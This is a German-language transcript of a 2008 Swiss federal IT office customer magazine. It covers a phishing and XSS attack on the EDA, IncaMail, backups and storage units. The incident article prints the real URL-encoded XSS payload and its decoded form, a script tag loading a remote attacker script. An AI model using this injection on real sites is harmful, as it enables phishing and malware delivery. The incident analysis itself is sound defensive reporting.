Editorial 3. Bits & Bytes 20 FAQ; Kurz notiert 21 Kurz gelesen; Trendreport 22 SMS-Interview 23 Mixed Pixels; BIT-Kontakt-Box

Größe: px
Ab Seite anzeigen:

Download "Editorial 3. Bits & Bytes 20 FAQ; Kurz notiert 21 Kurz gelesen; Trendreport 22 SMS-Interview 23 Mixed Pixels; BIT-Kontakt-Box"

Transkript

1 Eisbrecher Die Kundenzeitung des BIT Nr. 30 Juli 2008 Web 2.0: Eine kurze Geschichte seiner Entwicklung Seite 15 IT-Sicherheit: -Attacke auf das EDA Seite 4 GPS: Satelliten weisen den Weg Seite 13 Industrie Information Information Web 2.0 Web 1.0Web 1.0 Web 2.0 Web 3.0 Web 3.0 Web 4.0 Web 4.0 Schweizerische Eidgenossenschaft Confédération suisse Confederazione Svizzera Confederaziun svizra Eidgenössisches Finanzdepartement EFD Département fédéral des finances DFF Bundesamt für Informatik und Telekommunikation BIT Office fédéral de l'informatique et de la télécommunication OFIT

2 2 Inhalt Web 2.0: Eine kurze Geschichte seiner Entwicklung Seite 15 Editorial 3 IT-Thema 4 IT-Sicherheit: Im Posteingang lauert Ungemach 7 Interview: «Vorsicht bei HTML-Mails» IT-Sicherheit: -Attacke auf das EDA Seite 4 Produkte und Projekte 8 IncaMail: Eingeschrieben und sicher 9 Storage: Bundesverwaltung speichert sicher 12 Hardware-Recycling: IT-Altmaterial verkauft sich gut Eingeschoben 13 GPS und Co.: Orientierung total 15 Web 2.0: Eine vernetzte Geschichte Events 17 PR-Leute bloggen im BIT 18 «BIT in Action»: Infos aus erster Hand GPS: Satelliten weisen den Weg Seite 13 Bits & Bytes 20 FAQ; Kurz notiert 21 Kurz gelesen; Trendreport 22 SMS-Interview 23 Mixed Pixels; BIT-Kontakt-Box Der Heftumschlag zeigt die Ko-Evolution von Mensch und Computer. Mehr darüber ab Seite 15. Herausgeber Bundesamt für Informatik und Telekommunikation (BIT) Monbijoustrasse 74, CH-3003 Bern Telefon Intranet: Internet: Redaktionsleitung Nora Kelemen Redaktion Leo Hauser (HL), Ernst Schlumpf (SErn), Marc Bärtschi (MB). Redaktionelle Mitarbeit an dieser Ausgabe: Jose Klee (KlJ) Gestaltung Stefan Flükiger (Flu) Druck BBL, Vertrieb Publikationen, Bern Online-Version und Abonnement Kontakt Tel.: Nächste Ausgabe September 2008

3 EDITORIAL 3 Ihre Mitmach-Zeitung Liebe Leserin, lieber Leser Nora Kelemen Bereichsleiterin Kundenkommunikation Web 2.0 ist das Mitmach-Web. Tauchen Sie mit uns darin ein! Das Spektrum der Inhalte, welche von Webnutzern für ihresgleichen zusammengetragen wurden, ist immens. Wikipedia, YouTube und Flickr sind dabei die bekannteren Sites. Um Ihnen das Eintauchen zu erleichtern, geht der «Eisbrecher» online. Auf eisbrecher finden Sie eine nach Nutzungsgesichtspunkten gruppierte Linkliste (Wissen, Tools, Social networking, Sharing, Design it yourself, Food & Beverage, Community, Reisen, Podcasting, Fotos & Videos, Nachrichten). Für moderne Zeitgenossen gehört solch ein Tauchgang fast schon zur, zugegeben vergnüglichen Pflicht. Unser Lieblingslink ist übrigens die «Web Trend Map». Ein bisschen Zeit erfordert das Betrachten dieser Karte schon, doch es lohnt sich, denn sie gibt Übersicht, zeigt Zusammenhänge und ist darüber hinaus auch ein echter Augenschmaus. In dieser Ausgabe erzählt der «Eisbrecher» die Geschichte vom Urmenschen, der zum Web- Surfer mutierte. Wir erlauben uns dabei einen spielerischen Umgang mit dem trendigen Webjargon und wagen einen Ausblick auf Web 4.0 (Seite 15). Am schönsten ist es beim Tauchen, wenn man diesen ganz speziellen Schwebezustand erreicht: es ist ganz still, man ist entspannt und völlig ausgeglichen. In diesem ausbalancierten Zustand halten sich der eigene Auftrieb und die eigene Gewichtsverdrängung exakt die Waage. Leider ist dieses Austarieren gar nicht so einfach, zu leicht gerät die Balance ins Wanken. Das kann auch im Mitmach-Web geschehen. Ein harmlos erscheinender Aufruf an EDA-Mitarbeitende zur Beteiligung an einem Online-Foto-Wettbewerb entpuppte sich bald als Hacker-Angriff. Wie dann alles wieder ins Lot gebracht wurde und mit was für Angriffen potenziell noch zu rechnen ist, erfahren Sie ab Seite 4. Unter Wasser erscheint uns alles viel näher, was ein simples Experiment mit einem Wasserglas belegt. Taucht man ein Cocktail-Stäbchen ins Wasser, wird es uns an der Wasserkante wie geknickt erscheinen. Der Teil unterhalb der Wasserkante wird grösser aussehen, als derjenige oberhalb. Unser Auge sieht unter Wasser alles ungefähr um ein Viertel näher. Nun haben Sie möglicherweise in der «Computerworld» den interessanten Artikel «Die Bundesverwaltung speichert sicher» gelesen (falls nicht: Wir drucken ihn in diesem «Eisbrecher» nochmals ab). Können Sie aber auch die kniffligste aller Alltagsfragen zum Thema Speichern beantworten: Warum zeigt der Computer bei einem DVD-Rohling mit 4.7 GB Speicherplatz bloss 4.38 GB an? Der «Eisbrecher» bringt uns die Sache näher und gibt Antwort. Ab Seite 9. Gegen Ende des Tauchgangs informiert Sie Ihr GPS zuverlässig, welche Koralle Sie sich unbedingt noch anschauen sollten und welche Strömung Sie schliesslich sicher nach Hause führt. Der «Eisbrecher» erklärt, wie GPS funktioniert, was man mit GPS-Handys alles finden kann und was ein Ortungssystem auf WLAN-Basis in Zukunft alles bringen könnte (Seite 13). Eine vergnügliche Lektüre wünschen Nora Kelemen und das «Eisbrecher»-Team P.S.: Den «Eisbrecher» gibt s auch als PDF-Download, nur für den Fall, dass Sie gar nicht mehr aus dem Web 2.0 auftauchen mögen. Siehe

4 IT-Thema 4 IT-Sicherheit Im Posteingang lauert Ungemach Hacker führten im vergangenen November eine gezielte Virus-Attacke gegen das EDA durch, wohl mit dem Ziel an vertrauliche Informationen zu gelangen. Dank sofortiger Hinweise von aufmerksamen Mitarbeitenden ist der Angriff glimpflich abgelaufen. Doch ohne Zweifel wird es weitere Versuche geben, die Bundes-IT zu schädigen. BIT-Kontakt: Stefan Neuenschwander, Informatiksicherheitsbeauftragter Text: Leo Hauser Foto: Leo Hauser, Stefan Flükiger Böse «Käfer» gelangen heute nicht mehr so oft direkt als -Attachment auf den Rechner. Dafür landen im Posteingang zunehmend s mit Links zu Webseiten, die Schadsoftware enthalten. Es begann unverfänglich mit einer Einladung an über 500 Mitarbeitende im EDA. Die persönlich adressierten s trugen das vertraute Logo der Schweizerischen Eidgenossenschaft und riefen zur Teilnahme an einem Foto-Rating auf: Auf einer Webseite des Staatssekretariats für Wirtschaft (SECO) sollten die besten Einsendungen eines Amateur-Fotowettbewerbs unter Bundesmitarbeitenden bewertet und der Sieger oder die Siegerin erkoren werden eine Art unverdächtiges Mitmachweb. Wer seine Stimme abgeben wollte und den angegebenen Link in der anklickte, glaubte die Wettbewerbs-Webseite des SECO vor sich zu haben. Was die Besucherinnen und Besucher jedoch nicht wissen konnten: Die SECO-Seite war gefälscht! Wollte man sich die vermeintlichen Fotos genauer ansehen, lud man sich nichts ahnend eine Schadsoftware auf den Rechner. Selbstverständlich war auch der Absender gefälscht: Um bei den Empfängern der Vertrauen zu erwecken, gaben die Hacker als Absender eine (existierende) -Adresse des Schweizer Tourismus-Verbandes vor. Raffinierte Hacker-Technik Aus technischer Sicht handelte es sich bei dem Angriff auf das EDA um ein so genanntes Cross- Site-Scripting, kurz XSS. Darunter versteht man

5 IT-Thema 5 das Ausnutzen gewisser Sicherheitslücken auf einer Website, um dort über einen manipulierten Link einen eigenen Javascript-Code einzuschleusen, der dann auf dem Gerät des Opfers ausgeführt wird. Der Angreifer erhält dadurch die Möglichkeit, eigene Webseiteninhalte anzeigen zu lassen, während es für den Benutzer so aussieht, als befände er sich nach wie vor auf der Originalseite. Damit eine derartige Webseiten-Mimikry funktioniert, muss der User dazu gebracht werden, die entsprechende URL zu besuchen. Dies gelingt oft mittels eines Lockvogel- s wie jenem an die EDA-Mitarbeitenden. Solche s sind in aller Regel HTML-formatiert, weil sich dadurch die Manipulation am Link problemlos verschleiern lässt. Im vorliegenden Fall wurde eine damals noch fehlende Inputvalidierung auf einer Website der Bundesverwaltung ausgenutzt, um das Cross- Site-Scripting durchzuführen und die User auf eine gefälschte SECO-Webseite umzuleiten. Die gefälschten SECO-Inhalte wurden im Kontext von dargestellt, das einzige Element, das effektiv von admin.ch gebraucht, bzw. missbraucht wurde, war jedoch das PHP-Skript «Printme», welches eine Druckversion der jeweiligen Seite generiert (siehe Kasten). Admin.ch wurde also nur als «Reflektor» für die gefälschte SECO-Seite benutzt ein Hauptmerkmal des Cross-Site-Scriptings. Durch diesen Kniff bleibt sogar die Adresszeile im Browser vertrauenswürdig (beginnend mit «www.admin.ch»). Verräterische Schreibfehler Wie die Analyse des EDA-Vorfalls zeigte, verweist der Link in der auf das verwundbare «Printme»-Skript und löste dort ein Cross-Site- Scripting aus. Dadurch wurde eine Javascript- Datei von einem Server im ostafrikanischen Tansania heruntergeladen. Dieses Skript es wurde sofort nach dem Angriff XSS-untauglich gemacht stellte dann die gefälschte SECO-Site dar. Der Der XSS-Trick Der verlinkte Text in der HTML- lautete «Uebergang zur web-seite zur Stimmabgabe» (sic!). Dahinter verbarg sich folgender Link: h=1339e2d660b3135b:1775c445c06c1713&de= 1DEC54A5&site=%3C%73%63%72%69%70%7 4%20%73%72%63%3D%68%74%74%70%3A %2F%2F%31%39%36%2E%34%36%2E%31% 30%36%2E%37%31%2F%77%65%74%74%2E %6A%73%33C%2F%73%63%72%69%70%74 %3E&_lang=de Obiger Zahlensalat im Klartext ausgedrückt: (...) <script src=http:// /wett.js> </script> (...) Der Link bedeutet: Wenn die Seite aufgerufen wird, hole ein Javascript von der Seite mit dem Namen wett.js. auf der Webseite verlinkte Virus wiederum war auf einem Server in Beirut (Libanon) abgelegt. Die Malware tarnte sich als funktionierender Bildschirmschoner, dem die Hacker sogar ein ansprechendes Icon mit Schweizerkreuzchen verpasst hatten. Einmal aktiviert, zeigt der Screensaver Bilder des vermeintlichen Fotowettbewerbs. Im Hintergrund jedoch legte die Schadsoftware auf dem Rechner verschiedene Tasks an, welche sich bei jedem künftigen Logon des Benutzers aktiviert hätten. Die entsprechenden Files, die das Virus auf dem PC platzierte, waren geschützt, für den Benutzer unsichtbar und enthielten die Möglichkeit, mit verschiedenen externen Servern zu kommunizieren, von dort neue Schadsoftware zu laden oder dorthin gesammelte Informationen zu übermitteln. Der Angriff hatte sehr wahrscheinlich das Ziel, an vertrauliche Informationen wie z.b. Passwörter zu gelangen. Français Menaces sur la boîte de réception En novembre dernier, des pirates ont lancé une attaque de virus ciblée contre le DFAE dans le but de soutirer des informations confidentielles. Grâce à la réaction immédiate de collaborateurs attentifs, l attaque n a pas atteint son but. Mais ce n était certainement pas la dernière tentative de piratage contre le réseau informatique de la Confédération. Vous trouverez la version française de cet article sous

6 IT-Thema 6 Die Anlage des Angriffs auf das EDA war raffiniert genug, dass etwa 70 Mitarbeitende sich dazu verleiten liessen, beim angeblichen Bilder- Rating mitzumachen wodurch sich das Virus auf ihren PCs einnisten konnte. Einigen Mitarbeitenden kamen jedoch zu Recht die holprigen Formulierungen und die vielen Schreibfehler in der Einladungs- und auf der Wettbewerbs- Webseite suspekt vor. So war unter anderem von eidgenössischen «Zivilbeamten» die Rede, ein Begriff, der in der Bundesverwaltung nicht gebräuchlich ist. Auch hatten die Verfasser der Texte offenbar keine Tastatur mit Umlauten zur Verfügung. Dank der umgehenden Meldung beim HelpDesk des EDA konnten die IT-Spezialisten rasch intervenieren und dadurch grösseren Schaden verhindern. Die ca. 70 verseuchten Geräte konnten rasch identifiziert werden. Sie wurden gesperrt und neu aufgesetzt. Alle betroffenen Anwenderinnen und Anwender mussten ihre Passwörter ändern. Doch der nächste Angriff kommt bestimmt (siehe auch nebenstehendes Interview): Gemäss der Melde- und Analysestelle Informationssicherung MELANI (www.melani. admin.ch) lässt die aufwändige Art des Angriffs aufs EDA auf eine professionelle und mit einigen finanziellen und technischen Mitteln ausgestattete Täterschaft schliessen. Screenshot der gefälschten SECO-Website. Die gesamte Site wurde mittels JavaScript von einem Server in Tansania geladen. Mit einem Klick auf «Schauen» lud man sich nichts ahnend die Malware herunter. Das Design der Site entspricht dem Corporate Design des Bundes, verdächtig sind jedoch die zahlreichen sprachlichen Schnitzer im Text.

7 IT-Thema 7 «Vorsicht bei HTML-Mails» Reto Inversini, Informationssystem-Architekt/ Security im BIT, über gefährliche Mails und Webseiten. Eisbrecher: Kommen Angriffe auf die Bundes-IT häufig vor? Reto Inversini: Angriffe werden immer gezielter durchgeführt und haben neben Informationsbeschaffung vor allem wirtschaftliche Ziele. Grosse Virenausbrüche mit dem Ziel, die Verfügbarkeit einzuschränken, kommen kaum mehr vor. Stattdessen zielen die Angriffe darauf ab, möglichst unbemerkt die Kontrolle über ein Gerät zu übernehmen. Mit welchem konkreten Ziel? Dabei gibt es folgende drei Hauptbereiche: Informationsgewinnung (das geht von Passwörtern über Keylogger bis hin zum Abfluss von Firmengeheimnissen sowie Spionagetätigkeit) Identitätsdiebstahl Botnetze: Übernommene Geräte werden häufig in ein sogenanntes Botnetz eingereiht. Diese riesigen Verbünde von gekaperten Rechnern oft mehrere Geräte, selten auch mehrere Millionen werden v.a. für den Versand von Spam- und Phishing-Mails, seltener für DDoS-Angriffe verwendet. (Unter DDoS Distributed Denial of Service versteht man einen Angriff auf einen Computer mit dem Ziel, seine Verfügbarkeit zu stören. Im Gegensatz zur DoS-Attacke erfolgt der Angriff von vielen verteilten Rechnern aus. Anm. d. Red.) Woran erkennt man ein potenziell gefährliches ? Insbesondere Mails in HTML-Format sind mit Vorsicht zu geniessen, das Beispiel des EDA illustriert dies sehr gut. Mails aus unbekannter Quelle sind grundsätzlich mit Shift-Delete direkt zu löschen. Es ist im Grundsatz auch möglich, ein Mail mit admin.ch-absender zu fälschen und ins Bundesnetz zu senden. Prinzipiell sollte man sich bei jedem Mail kurz überlegen, ob man es erwartet hat und ob der Stil des Schreibenden mit dem erwarteten Stil übereinstimmt. Darf man Links in s anklicken? Nein, das sollte man nicht tun, ausser man ist sehr sicher, dass das Mail effektiv von der richtigen Person stammt, z.b. weil es eine gültige Secur -Signatur hat. Reine Textmails sind weniger riskant, weil man dort den gesamten Link sieht. In einem HTML-Mail wird der Link aber unter dem Text verborgen (z.b. «Hier klicken für die BIT-Homepage» ist der Name des Links, darunter verbirgt sich jedoch eine x-beliebige URL, z.b. Es ist immer besser, einen Link abzutippen oder aus den eigenen Bookmarks zu nehmen. Wie soll man sich verhalten, wenn man eine verdächtige erhalten hat? Wenn das Mail keinen Bezug zur Bundesverwaltung hat, löschen Sie es einfach mit Shift-Delete. Wenn das Mail einen Bezug zur Bundesverwaltung oder zu Ihnen als Person vorzuspielen versucht, informieren Sie Ihren Informationssicherheitsbeauftragten (ISBO), speichern Sie das Mail und leiten es danach als Attachment an weiter. Was ist zu tun, wenn man den Hackern auf den Leim gekrochen ist und sich eine Malware eingefangen hat? Ziehen Sie das Netzwerkkabel aus Ihrem Computer und informieren Sie das Service Desk BIT, bzw. den Helpdesk Ihrer Organisation. Wo lauert sonst noch im Internet Malware? Malware wird nicht nur per Mail verteilt, sondern immer häufiger auch direkt via Web, z.b. durch bösartige Werbebanner. Immer öfter werden Links auf bösartige Seiten oder Dateien via Instant Messaging zum Benutzer gebracht. Wenn Malware per Mail verteilt wird, ist es sehr oft so, dass nur noch ein Link auf die Site mit der Malware im Mail enthalten ist. Bösartige Dateianhänge werden immer seltener, existieren aber nach wie vor. Keine Schonung für Screensaver Als Massnahme bezüglich des Auftretens von virenverseuchten Bildschirmschonern hat das BIT den Download von Dokumenten mit der Endung.scr (Screensaver) via Webbrowser gesperrt. Diese Filetypen waren auf den Mailservern des Bundes (Outlook, ) bereits seit Mitte 2004 blockiert. Details:

8 Produkte & Projekte 8 Elektronisches Einschreiben IncaMail: Eingeschrieben und sicher Inca? Die Ähnlichkeit ist wohl mehr zufällig als gewollt, denn dieses Inca hat weder mit dem berühmten Inca Kaffee noch mit einer Gemeinde auf Mallorca noch mit einem Volk der Anden irgend etwas gemein. Inca, zusammen mit Mail, bezeichnet eine Dienstleistung der Post. BIT-Kontakt: Peter Balsiger, Abteilungsleiter E-Government Text: Ernst Schlumpf Empfänger [inca] Mail Sender Informations-Mail Vers and Wie viele IT-Bezeichnungen ist auch dieser Begriff Inca ein Kürzel, welches sich aus den vier englischsprachigen, aber durchaus gebräuchlichen Begriffen Integrity (Integrität), Non-repudiability (Nichtabstreitbarkeit), Confidentiality (Vertraulichkeit) und Authenticity (Authentizität) zusammensetzt. In Kombination mit dem Begriff Mail ergibt das dann IncaMail. Sinn und Zweck dieser zeitgemässen und leicht handhabbaren Anwendung: Mails können elektronisch eingeschrieben werden, der Dokumentenverkehr wird damit sicher, nachweisbar und vor allem auch rechtsgültig. Quittung Abhol-Frist Abholung Informations-Mail «Safety first» Obwohl immer mehr Dokumente elektronisch versandt werden, ist der heutige Mailverkehr immer noch alles andere als sicher. Das gibt zu denken und ruft die Sicherheitsleute auf den Plan, welche den Auftrag haben, im Sinne der Kunden für sichere Übertragungswege zu sorgen. In diesem Kontext hat die Schweizerische Post in Zusammenarbeit mit dem BIT IncaMail entwickelt, eine Lösung mit welcher Verträge, sensible Kundendaten, Kündigungen, Gesundheitsdaten und alle anderen Daten und Dokumente schneller, sicherer und preiswerter verschickt werden können als auf dem physischen Weg. Voraussetzung für ein funktionierendes IncaMail sind Zertifikate, Client-Applikationen und ein IncaMail-Account für Sender und Empfänger. Dank der vom BIT betriebenen Public Key Infrastructure (Admin PKI), welche die entsprechenden Zertifikate zur Verfügung stellt, ist eine hochwertige, elektronische Kommunikation garantiert. IncaMail in der Praxis In der praktischen Anwendung wird eine Nachricht (mit allfälligen Begleitdokumenten) automatisch mit dem Zertifikat des Absenders signiert und mit dem Schlüssel des Empfängers verschlüsselt. Die Nachricht geht via Internet an die IncaMail-Plattform der Post und legt sich dort ins Postfach des Empfängers. Der Post-Server informiert den Empfänger über die Sendung. Dieser Adressat ist der einzige, der authorisiert ist, die Nachricht zu entschlüsseln. Sie muss zudem innerhalb einer präzise definierten Frist abgeholt sein. Holt der Adressat sie nicht ab, wird sie gelöscht und Absender und Empfänger werden informiert. Holt er sie ab, wird die Datei geprüft und beim Download automatisch entschlüsselt. Eine Quittung bestätigt diesen gesamten Prozess und macht ihn damit sauber nachvollziehbar und für die registrierten Inhaber der IncaMail- Accounts rechtlich verbindlich. Links Die Produktwebsite der Schweizerischen Post für den sicheren Austausch von elektonischen Daten Informationen zur Admin PKI Versand-Datum Abhol-Datum Lösch-Datum t

9 Produkte & Projekte 9 Storage Bundesverwaltung speichert sicher Die enorme Zunahme unstrukturierter Daten erschwerte beim BIT die Datensicherung. Mit der Einführung einer neuen Backup-Software ist das BIT nun wieder auf der sicheren Seite. Artikel aus der Zeitschrift «Computerworld» Nr. 13/2008. Abdruck mit freundlicher Genehmigung der Redaktion. BIT-Kontakt: Stefan Kälin, Bereichsleiter Storage Text: Claudia Bardola («Computerworld») Foto: Leo Hauser Die steigende Datenflut in Unternehmen und Organisation wird heute vor allem durch unstrukturierte Daten verursacht: Mittlerweile liegt nicht einmal die Hälfte aller Daten in strukturierter Form in Datenbanken und Geschäftsapplikationen vor. Der Rest verteilt sich grösstenteils unstrukturiert auf - und Messaging- Systeme und Office-Dateien. Diese Entwicklung bereitete auch Stefan Kälin, Bereichsleiter Storage beim BIT, zunehmend Kopfzerbrechen. «Die Zunahme unstrukturierter Daten gestaltete sich dramatisch. Dabei machte uns aber weniger der Speicherplatz als vielmehr die Datensicherung Sorgen.» So reichte das für das Backup angelegte Zeitfenster am Wochenende kaum noch aus. Zudem waren es auch die Backup-Kosten, die Kälin nachdenklich werden liessen: Teurer Primärspeicher wurde durch die redundante Ablage von Daten, insbesondere von -Anhängen, belegt. Der installierte Speicherplatz beim BIT beträgt mehr als 511 Terabyte. Monatlich kommt im Schnitt mehr als 1 Terabyte (1 Terabyte = 1 Million Megabyte) hinzu. Für Kälin stand fest, dass die bestehende Datensicherungs-Software den Anforderungen nicht länger würde genügen können und daher dringend abgelöst werden musste. Mit seinem Team schrieb er das Projekt gemäss den Vorgaben der Welthandelsorganisation (WTO) aus. Die sorgfältige Evaluation der Angebote führte zu einer Shortlist von drei Anbietern. Bei der Entscheidungsfindung hatte sich die Crew bewusst Zeit genommen: Von jedem Tool wurde eine Test-installation aufgesetzt, die während eines Jahres gründlich geprüft wurde. «Die Produkte lagen dicht beieinander», erinnert sich Kälin. Am Ende erhielt Veritas NetBackup von Symantec den Zuschlag. Zwei Gründe waren entscheidend: Net- Backup kam besser mit heterogenen Umgebungen und der dadurch notwendigen Unterstützung unterschiedlicher Betriebssystemderivate zurecht. Zudem punktete die Software mit umfangreicher Funktionalität. Hat den Durchblick: Stefan Kälin, Bereichsleiter Storage. Jede einzelne «Kassette» dieser Tape Library im BIT-Rechenzentrum fasst 1,5 Terabyte an Daten. Heterogene Infrastruktur Vor allem die Unterstützung heterogener Umgebungen war wichtig. Denn grundsätzlich sieht das Konzept des BIT drei Français Stockage des données: l administration fédérale assure La sauvegarde des données à l OFIT devenait difficile en raison de la croissance énorme des données non structurées. Avec l introduction d un nouveau logiciel de backup, l OFIT peut à nouveau stocker les données en toute sécurité. Vous trouverez la version française de cet article sous

10 Produkte & Projekte 10 Speicher-Systeme Bit 1Byte 5 KB 1 Reiskorn 8 Reiskörner 1.2 kg Reis Standorte für die Rechenzentren vor: Das Hauptrechenzentrum im so genannten «Titanic II»- Gebäude in Bern, ein Backup-Rechenzentrum in knapp fünf Kilometer Entfernung sowie ein militärisch geschützter Disaster-Recovery-Standort, der etwa 100 km entfernt ist. Alle Standorte sind über redundante Höchstgeschwindigkeitsleitungen miteinander verbunden. Musiksong mp3 CD 5 MB 750 MB 1.2 t 180 t 2 Reispackungen à 600 g 40 Reissäcke à 30kg 3.7 Schiffscontainer à 2.44 x 2.59 x 12.2m Das aktuelle Konzept hat seinen Ursprung in der Entscheidung des Bundes aus dem Jahr 2000, die Anzahl der damals 75 Informatikabteilungen auf Departementsstufe auf sieben zu konsolidieren. «Damit», erinnert sich Stefan Kälin, «bekamen wir ganz unterschiedliche Systemarchitekturen ins Haus, angefangen bei den Betriebssystemderivaten bis hin zu den Speichersystemen.» Davon ist heute nicht mehr viel übrig. Die Standardisierung aller Komponenten wurde und wird konsequent vorangetrieben. Die Integrationsaufgaben durch das Insourcing der Departemente umfasste auch die Backup-Software. 1 GB 240 t Memorystick 4.9 Schiffscontainer à 2.44 x 2.59 x 12.2m 100 GB t 489 x Laptop Schiffscontainer à 2.44 x 2.59 x 12.2m 1 TB t Externe Harddisk Frachtschiff mit 4899 Containern 300 TB 72 Mt Zentrales Disk-Speichersystem 300 Frachtschiffe mit Containern Der Reisrechner Ein König wollte den Erfinder des Schachbretts entlohnen und fragte nach seinem Wunsch. Der weise Brahmane antwortete: «Ich wünsche mir ein Reiskorn auf das erste Spielfeld und auf jedes folgende Feld immer die doppelte Anzahl Reiskörner des vorhergehenden Feldes. Der König willigte ein und musste bald die Unerfüllbarkeit dieses Wunsches einsehen. Es hätte Reiskörner gebraucht: 553 Gigatonnen Reis! Wie die Reiskörner auf dem Schachbrett nimmt auch die Datenmenge stetig zu, wie der «Reisrechner» veranschaulicht: Entspricht ein Bit (kleinste darstellbare Datenmenge) einem Reiskorn, so entspricht bereits der Inhalt einer einzigen CD dem Inhalt von 3 Schiffscontainern. Idee und Kreation: Musqueteers GmbH - Kompanie für Kommunikation für Hitachi Data Systems AG Elegantes Backup Die Speicherinfrastruktur des BIT ist vollkommen symmetrisch aufgebaut. Primär- und Sekundärstandort sind über eine DWDM-Verbindung gekoppelt (DWDM = Dense Wavelength Division Multiplexing; ermöglicht Netze mit extrem hoher Übertragungskapazität). Als Backup sind beide Standorte zudem mit einem Gigabit-IP-Backbone verbunden. Die veränderten Daten werden gleichzeitig an beiden Standorten auf identische Tape Libraries geschrieben. «Das erledigt NetBackup nun sehr elegant», ist Stefan Kälin zufrieden. In dieses Sicherungskonzept sind auch alle Daten von Applikationen eingeschlossen, für die ein erhöhter Schutzbedarf im Projekt Katastrophenvorsorge für die Bundesverwaltung definiert wurde. Dazu gehören beispielsweise die s. Diese Daten werden mehrfach am Tag über das Gigabit-Netz vom Primärstandort an den Sekundärstandort gespiegelt und von dort aus auf Band gesichert. NetBackup macht täglich eine inkrementelle Datensicherung (auch Zuwachssicherung genannt) der am selben Tag geänderten Daten. Diese Sicherungsbänder bleiben sieben Tage erhalten, bevor sie wieder überschrieben werden. Wöchentlich findet eine Vollsicherung statt, die drei Wochen aufbewahrt wird. Dazu kommt eine monatliche Vollsicherung, die erst nach 90 Tagen wieder überschrieben werden darf. «Dies sind

11 Produkte & Projekte 11 die Standardfälle», erklärt Stefan Kälin. «Andere Sicherungszyklen lassen sich mit NetBackup natürlich ohne Problem einrichten. Das liegt allein an den Anforderungen unserer Kunden.» Clevere Speicherhierarchien Das Problem mit der redundanten Datenspeicherung auf teuren Primärspeichern hat Kälin ebenfalls gelöst. Es kommt nun eine ILM-Strategie (ILM = Information Lifecycle Management) zum Tragen, nach der Daten ihrer Bedeutung gemäss auf das jeweils geeignete Speichermedium verschoben werden. Daten älter als beispielsweise drei Monate werden automatisch auf billigen Speicher übertragen. «Wir haben eine Speicherhierarchie aus High-end-, Mid-range- und Low-cost-Systemen eingerichtet», sagt Kälin. «Im Low-cost-Bereich streben wir Kosten von 10 Rappen pro Gigabyte und Monat an.» Dank dieser Speicherhierarchie verkleinert sich das Backup- Volumen deutlich. Das BIT hat heute für die Datensicherung mehrere Tape Libraries im Einsatz. «Die Petabyte- Grenze (1 Petabyte = 1000 Terabyte, Red.) haben wir längst überschritten», so Stefan Kälin. Auch optische Speichersysteme sind derzeit noch im Einsatz, werden jedoch schon bald durch Disk- Archive abgelöst. «Für Archivzwecke sind Disks grundsätzlich gut geeignet», sagt der BIT-Bereichsleiter. «Als Back-up-Medien finden wir sie weniger brauchbar. Das Tape wird uns hier noch lange als preisgünstiges und flexibles Medium erhalten bleiben, vor allem mit den künftigen 2-Terabyte-Kassetten.» Daher steht das BIT-Team dem Konzept der Virtual Tape Library, also Disk- Systemen, die sich wie Tapes ansprechen lassen, noch skeptisch gegenüber. Bevor dies in Angriff genommen wird, soll zunächst einmal die volle Funktionalität von NetBackup ausgenutzt werden. Wie viele Bytes sind ein Gigabyte? Man kennt das: Auf der Verpackung verspricht die externe Festplatte ein Fassungsvermögen von 500 Gigabytes (GB), doch nach dem Kauf meldet das Betriebssystem des PCs bloss deren 466. Dasselbe beim DVD-Rohling mit seinen angeblichen 4,7 GB Speichervermögen: Legt man den Rohling ins Laufwerk zeigt der PC plötzlich nur noch 4,38 GB an. Eine Mogelpackung? Die Erklärung: Hersteller von Speicherplatten und DVD-Rohlingen zählen auf andere Weise als der Computer und das zu Recht. Denn gemäss Système international d unités (SI) sind die Präfixe Kilo, Mega, Giga etc. für dezimale Vielfache reserviert. Nach den international anerkannten SI-Regeln entspricht ein Kilobyte (KB) also hochoffiziell 1000 (10 3 ) Bytes und ein Megabyte (MB) exakt einer Million (10 6 ) Bytes. Und die Hersteller von Festplatten, DVD- und Blu-ray-Disc-Rohlingen tun nichts anderes, als die Präfixe regelkonform zu verwenden. Nicht so der PC: Der rechnet seit eh und je mit binären Vielfachen: Ein KB entspricht für ihn 1024 (2 10 ) Bytes, ein MB (2 20 ) Bytes usw. In der binären Welt des Computers ist es also in etwa so, wie wenn man eine bestimmte Menge Wasser nicht in standardisierte 1-Liter-Krüge, sondern sie in etwas grössere Krüge abfüllen würde: Das Wasser fände in weniger Krügen Platz. Gleichermassen passen die 500 Milliarden Bytes auf der 500-GB-Festplatte locker in 466 der etwas grösseren «binären Gigabytes» des Computers. Nun, dieses mega Durcheinander müsste nicht sein, verwendete man nur die richtigen Einheiten die Präfixe Kilo, Mega, Giga usw. also ausschliesslich für dezimale Vielfache. Für binäre Vielfache existieren nämlich eigene Präfixe, die sich in der Praxis aber noch nicht durchgesetzt haben: Sie heissen Kibi (Ki), Mebi (Mi), Gibi (Gi) usw., abgeleitet von den Begriffen Kilobinary, Megabinary, Gigabinary usw. Sinngemäss spricht man von Kibibyte (KiB), Mebibyte (MiB) und Gibibyte (GiB). Zum Vergleich: 1 Kilobyte (KB) = 10 3 Bytes = 1000 Bytes 1 Kibibyte (KiB) = 2 10 Bytes = 1024 Bytes 1 Megabyte (MB) = 10 6 Bytes = Bytes 1 Mebibyte (MiB) = 2 20 Bytes = Bytes 1 Gigabyte (GB) = 10 9 Bytes = Bytes 1 Gibibyte (GiB) = 2 30 Bytes = Bytes Das Wichtigste aber: Die Konsumentinnen und Konsumenten werden also nicht übers Ohr gehauen, denn unabhängig von der Zählweise hat s auf der DVD oder der Festplatte immer gleich viele Bytes Speicherplatz. HL Système international d unités (SI)

